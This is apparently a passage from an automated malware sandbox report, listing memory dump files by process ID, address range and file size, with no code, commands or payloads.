-
memory/4940-62-0x00000000702B0000-0x000000007042B000-memory.dmpFilesize
1.5MB
-
memory/4964-26-0x00000000702B0000-0x000000007042B000-memory.dmpFilesize
1.5MB
-
memory/4964-20-0x00000000702B0000-0x000000007042B000-memory.dmpFilesize
1.5MB
-
memory/4964-18-0x00007FFA09AD0000-0x00007FFA09CC5000-memory.dmpFilesize
2.0MB
-
memory/4964-17-0x00000000702B0000-0x000000007042B000-memory.dmpFilesize
1.5MB
-
memory/4964-61-0x00000000702B0000-0x000000007042B000-memory.dmpFilesize
1.5MB
-
memory/4964-16-0x0000000000CB0000-0x000000000153E000-memory.dmpFilesize
8.6MB
-
memory/5196-224-0x0000000000FE0000-0x0000000000FF0000-memory.dmpFilesize
64KB
-
memory/5196-289-0x00007FF9E8B60000-0x00007FF9E9621000-memory.dmpFilesize
10.8MB
-
memory/5196-369-0x0000000000FE0000-0x0000000000FF0000-memory.dmpFilesize
64KB
-
memory/5196-346-0x0000000000FE0000-0x0000000000FF0000-memory.dmpFilesize
64KB
-
memory/5196-310-0x0000000000FE0000-0x0000000000FF0000-memory.dmpFilesize
64KB
-
memory/5196-222-0x00007FF9E8B60000-0x00007FF9E9621000-memory.dmpFilesize
10.8MB
-
memory/5196-226-0x00000000028E0000-0x0000000002906000-memory.dmpFilesize
152KB
-
memory/5196-239-0x00000000028E0000-0x0000000002906000-memory.dmpFilesize
152KB
-
memory/5196-344-0x0000000002920000-0x0000000002988000-memory.dmpFilesize
416KB
-
memory/5196-314-0x00000000028E0000-0x0000000002906000-memory.dmpFilesize
152KB
-
memory/5196-246-0x0000000002920000-0x0000000002988000-memory.dmpFilesize
416KB
-
memory/5196-264-0x0000000000FE0000-0x0000000000FF0000-memory.dmpFilesize
64KB
-
memory/5320-367-0x00007FF9E8B60000-0x00007FF9E9621000-memory.dmpFilesize
10.8MB
-
memory/5644-286-0x00007FF9E8B60000-0x00007FF9E9621000-memory.dmpFilesize
10.8MB
-
memory/5644-290-0x0000000003350000-0x0000000003360000-memory.dmpFilesize
64KB
-
memory/5644-285-0x0000000000810000-0x00000000008F4000-memory.dmpFilesize
912KB
-
memory/5836-327-0x000002BAB0990000-0x000002BAB09B2000-memory.dmpFilesize
136KB
-
memory/5836-342-0x000002BA981E0000-0x000002BA981F0000-memory.dmpFilesize
64KB
-
memory/5836-313-0x000002BA981E0000-0x000002BA981F0000-memory.dmpFilesize
64KB
-
memory/5836-311-0x00007FF9E8B60000-0x00007FF9E9621000-memory.dmpFilesize
10.8MB
-
memory/5836-312-0x000002BA981E0000-0x000002BA981F0000-memory.dmpFilesize
64KB